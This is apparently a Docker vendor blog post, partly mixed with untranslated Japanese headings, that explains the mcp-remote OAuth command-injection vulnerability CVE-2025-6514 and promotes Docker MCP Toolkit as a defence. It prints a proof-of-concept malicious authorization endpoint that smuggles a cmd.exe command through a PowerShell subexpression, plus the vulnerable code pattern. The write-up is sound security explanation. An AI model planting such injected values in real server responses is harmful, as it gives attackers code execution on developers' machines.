MCP Horror Stories: The Supply Chain Attack

This is Part 2 of our MCP Horror Stories series, an in-depth look at real-world security incidents exposing the vulnerabilities in AI infrastructure, and how the Docker MCP Toolkit delivers enterprise-grade protection.

The Model Context Protocol (MCP) promised to be the “USB-C for AI applications” – a universal standard enabling AI agents like ChatGPT, Claude, and GitHub Copilot to safely connect to any tool or service. From reading emails and updating databases to managing Kubernetes clusters and sending Slack messages, MCP creates a standardized bridge between AI applications and the real world.

But as we discovered in Part 1 of this series, that promise has become a security nightmare. For Part 2, we’re covering a critical OAuth vulnerability in mcp-remote that led to credential compromise and remote code execution across AI development environments.

Today’s Horror Story: The Supply Chain Attack That Compromised 437,000 Environments

In this issue, we dive deep into CVE-2025-6514 – a critical vulnerability that turned mcp-remote, a trusted OAuth proxy used by nearly half a million developers, into a remote code execution nightmare. This supply chain attack represents the first documented case of full system compromise achieved through the MCP infrastructure, affecting AI development environments at organizations using Cloudflare, Hugging Face, Auth0, and countless others.

学習内容:

• How a simple OAuth configuration became a system-wide security breach
• The specific attack techniques that bypass traditional security controls
• Why containerized MCP servers prevent entire classes of these attacks
• Practical steps to secure your AI development environment today

Why This Series Matters

Each “Horror Story” in this series examines a real-world security incident that transforms laboratory findings into production disasters. These aren’t hypothetical attacks – they’re documented cases where the MCP security issues and vulnerabilities we identified in Part 1 have been successfully exploited against actual organizations and developers.

Our goal is to show the human impact behind the statistics, demonstrate how these attacks unfold in practice, and provide concrete guidance on protecting your AI development infrastructure through Docker’s security-first approach to MCP deployment.

The story begins with something every developer has done: configuring their AI client to connect to a new tool…

Caption: comic depicting OAuth vulnerability in mcp-remote horror story ~ a remote code execution nightmare

問題を

In July 2025, JFrog Security Research discovered CVE-2025-6514. CVE-2025-6514 is a critical vulnerability in mcp-remote that affects how AI tools like Claude Desktop, VS Code, and Cursor connect to external services. With a devastating CVSS score of 9.6 out of 10, this vulnerability represents the first documented case of full remote code execution achieved against an MCP client in a real-world scenario.

The Scale of the Problem

The impact is staggering. The mcp-remote package has been downloaded more than 437,000 times, making this vulnerability a supply chain attack affecting hundreds of thousands of AI development environments. mcp-remote has been featured in integration guides from major platforms, including Cloudflare, Hugging Face, and Auth0, demonstrating its widespread enterprise adoption.

How the Attack Works

Here’s what happened: mcp-remote, a widely-used OAuth proxy for AI applications, trusts server-provided OAuth endpoints without validation. An attacker crafted a malicious authorization URL that gets executed directly by your system’s shell. When you configure your AI client to use a new tool, you’re essentially trusting that tool’s server to behave properly. CVE-2025-6514 shows what happens when that trust is misplaced.

To understand how CVE-2025-6514 became possible, we need to examine the Model Context Protocol’s architecture and identify the specific design decisions that created this attack vector. MCP consists of several interconnected components, each representing a potential point of failure in the security model.

• MCP Client represents AI applications like Claude Desktop, VS Code, or Cursor that receive user prompts and coordinate API calls. In CVE-2025-6514, the client becomes an unwitting enabler, faithfully executing what it believes are legitimate OAuth flows without validating endpoint security.
• mcp-remote (Third-Party OAuth Proxy) serves as the critical vulnerability point—a community-built bridge that emerged to address OAuth limitations while the MCP specification continues evolving its authentication support. This proxy handles OAuth discovery, processes server-provided metadata, and integrates with system URL handlers. However, this third-party solution’s blind trust in server-provided OAuth endpoints creates the direct pathway from malicious JSON to system compromise.

Caption: diagram showing the authentication workflow and attack surface

• Communication Protocol carries JSON-RPC messages between clients and servers, including the malicious OAuth metadata that triggers CVE-2025-6514. The protocol lacks built-in validation mechanisms to detect command injection attempts in OAuth endpoints.
• System Integration connects mcp-remote to operating system services through URL handlers and shell execution. When mcp-remote processes malicious OAuth endpoints, it passes them directly to system handlers—PowerShell on Windows, shell commands on Unix—enabling arbitrary code execution.

The vulnerability happens in step 4. mcp-remote receives OAuth metadata from the server and passes authorization endpoints directly to the system without validation.

Technical Breakdown: The Attack

Here’s how a developer’s machine and data get compromised:

1. Legitimate Setup

When users want to configure their LLM host, such as Claude Desktop, to connect to a remote MCP server, they follow standard procedures by editing Claude’s configuration file to add an mcp-remote command with only the remote MCP server’s URL:

{
  "mcpServers": {
    "remote-mcp-server-example": {
      "command": "npx",
      "args": [
         "mcp-remote", 
         "http://remote.server.example.com/mcp"
      ]
    }
  }
}

2. OAuth Discovery Request

When the developer restarts Claude Desktop, mcp-remote makes a request to http://remote.server.example.com/.well-known/oauth-authorization-server to get OAuth metadata.

3. Malicious Response

Instead of legitimate OAuth config, the compromised server returns:

{ 
  "authorization_endpoint": "a:$(cmd.exe /c whoami > c:\\temp\\pwned.txt)",     
  "registration_endpoint": "https://remote.server.example.com/register", 
  "code_challenge_methods_supported": ["S256"] 
}

Note: The a: protocol prefix exploits the fact that non-existing URI schemes don’t get URL-encoded, allowing the $() PowerShell subexpression to execute. This specific technique was discovered by JFrog Security Research as the most reliable way to achieve full command execution.

4. Code Execution

mcp-remote processes this like any OAuth endpoint and attempts to open it in a browser:

// Vulnerable code pattern in mcp-remote (from auth.ts)
const authUrl = oauthConfig.authorization_endpoint;
// No validation of URL format or protocol
await open(authUrl.toString()); // Uses 'open' npm package

The open() function on Windows executes:

powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -EncodedCommand '...'

Which decodes and runs:

Start "a:$(cmd.exe /c whoami > c:\\temp\\pwned.txt)"

The a: protocol triggers Windows’ protocol handler, and the $() PowerShell subexpression operator executes the embedded cmd.exe command with your user privileges.

The Impact

Within seconds, the attacker now has:

• Your development machine compromised
• Ability to execute arbitrary commands
• Access to environment variables and credentials
• Potential access to your company’s internal repositories

How Docker MCP Toolkit Eliminates This Attack Vector

The current MCP ecosystem forces developers into a dangerous trade-off between convenience and security. Every time you run npx -y @untrusted/mcp-server or uvx some-mcp-tool, you’re executing arbitrary code directly on your host system with full access to:

• Your entire file system
• All network connections
• 環境変数とシークレット
• システムリソース

This is exactly how CVE-2025-6514 achieves system compromise—through trusted execution paths that become attack vectors. When mcp-remote processes malicious OAuth endpoints, it passes them directly to your system’s shell, enabling arbitrary code execution with your user privileges.

Docker’s Security-First Architecture

Docker MCP Catalog and Toolkit represent a fundamental shift toward making security the path of least resistance. Rather than patching individual vulnerabilities, Docker built an entirely new distribution and execution model that eliminates entire classes of attacks by design. The explosive adoption of Docker’s MCP Catalog – surpassing 5 million pulls in just a few weeks – demonstrates that developers are hungry for a secure way to run MCP servers. 

Docker MCP Catalog and Toolkit fundamentally solves CVE-2025-6514 by eliminating the vulnerable architecture entirely. Unlike npm packages that can be hijacked or compromised, Docker MCP Catalog and Toolkit include:

• Cryptographic verification ensuring images haven’t been tampered with
• Transparent build processes for Docker-built servers
• Continuous security scanning for known vulnerabilities
• Immutable distribution through Docker Hub’s secure infrastructure

Eliminating Vulnerable Proxy Patterns

1. Native OAuth Integration

Instead of relying on mcp-remote, Docker Desktop handles OAuth directly:

# No vulnerable mcp-remote needed
docker mcp oauth ls
github | not authorized
gdrive | not authorized

# Secure OAuth through Docker Desktop
docker mcp oauth authorize github
# Opens browser securely via Docker's OAuth flow

docker mcp oauth ls
github | authorized  
gdrive | not authorized  

2. No More mcp-remote Proxy

Instead of using vulnerable proxy tools, Docker provides containerized MCP servers:

# Traditional vulnerable approach:
{
  "mcpServers": {
    "remote-server": {
      "command": "npx",
      "args": ["mcp-remote", "http://remote.server.example.com/mcp"]
    }
  }
}

# Docker MCP Toolkit approach:
docker mcp server enable github-official
docker mcp server enable grafana

No proxy = No proxy vulnerabilities.

3. Container Isolation with Security Controls

While containerization doesn’t prevent CVE-2025-6514 (since that vulnerability occurs in the host-based proxy), Docker MCP provides defense-in-depth through container isolation for other attack vectors:

# Maximum security configuration
docker mcp gateway run \
  --verify-signatures \
  --block-network \
  --block-secrets \
  --cpus 1 \
  --memory 1Gb

This protects against tool-based attacks, command injection in MCP servers, and other container-breakout attempts.

4. Secure Secret Management

Instead of environment variables, Docker MCP uses Docker Desktop’s secure secret store:

# Secure secret management
docker mcp secret set GITHUB_TOKEN=ghp_your_token
docker mcp secret ls
# Secrets are never exposed as environment variables

5. Network Security Controls

Prevent unauthorized outbound connections:

# Zero-trust networking
docker mcp gateway run --block-network
# Only allows pre-approved destinations like api.github.com:443

6. Real-Time Threat Protection

Active monitoring and prevention:

# Block secret exfiltration
docker mcp gateway run --block-secrets
# Scans tool responses for leaked credentials

# Resource limits prevent crypto miners
docker mcp gateway run --cpus 1 --memory 512Mb

7. Attack Prevention in Practice

The same attack that works against traditional MCP fails against Docker:

# Traditional MCP (vulnerable to CVE-2025-6514)
npx mcp-remote http://malicious-server.com/mcp
# → OAuth endpoint executed on host → PowerShell RCE → System compromised

# Docker MCP (attack contained)
docker mcp server enable untrusted-server
# → Runs in container → L7 proxy controls network → Secrets protected → Host safe

8. Practical Security Improvements

Here’s what you get with Docker MCP Toolkit:

Best Practices for Secure MCP Deployment

1. Start with Docker-built servers – Choose the gold standard when available
2. Migrate from mcp-remote – Use containerized MCP servers instead
3. Enable security controls – Use --block-network and --block-secrets
4. Verify images – Use --verify-signatures for supply chain security
5. Set resource limits – Prevent resource exhaustion attacks
6. Monitor tool calls – Enable logging with --log-calls for audit trails
7. Regular security updates – Keep Docker MCP Toolkit updated

Take Action: Secure Your AI Development Today

The path to secure MCP development starts with a single step. Here’s how you can join the movement away from vulnerable MCP practices:

• Browse the Docker MCP Catalog to find containerized, verified MCP servers that replace risky npm packages with enterprise-grade security.
• Install Docker Desktop and run MCP servers safely in isolated containers with help with Docker MCP Toolkit. Compatible with all major AI clients including Claude Desktop, Cursor, VS Code, and more—without the security risks.
• Have an MCP server? Help build the secure ecosystem by submitting it to the Docker catalog. Choose Docker-built for maximum security or community-built for container isolation benefits.

結論

CVE-2025-6514 demonstrates why the current MCP ecosystem needs fundamental security improvements. By containerizing MCP servers and eliminating vulnerable proxy patterns, Docker MCP Toolkit doesn’t just patch this specific vulnerability—it prevents entire classes of host-based attacks.

Coming up in our series: MCP Horror Stories issue 3 will explore how GitHub’s official MCP integration became a vector for private repository data theft through prompt injection attacks.

さらに詳しく

• MCP カタログをご覧ください。 MCPカタログにアクセス 特定のニーズを安全に解決するMCPサーバーを検出します。
• 数百台のMCPサーバーを使用してテストします。 Docker Desktopのダウンロード カタログ内の任意のMCPサーバーをダウンロードして、お気に入りのクライアント(Gordon、Claude、Cursor、VSCodeなど)で使用します
• サーバーを提出する: 安全な AI ツール配布に向けた動きに参加してください。詳細については、投稿ガイドラインをご覧ください。
• 進捗状況をフォローする: リポジトリにスターを付けて、 MCP ゲートウェイのリリース とリモート サーバー機能に関する更新を監視します。
• Read issue #1 of this MCP Horror Stories series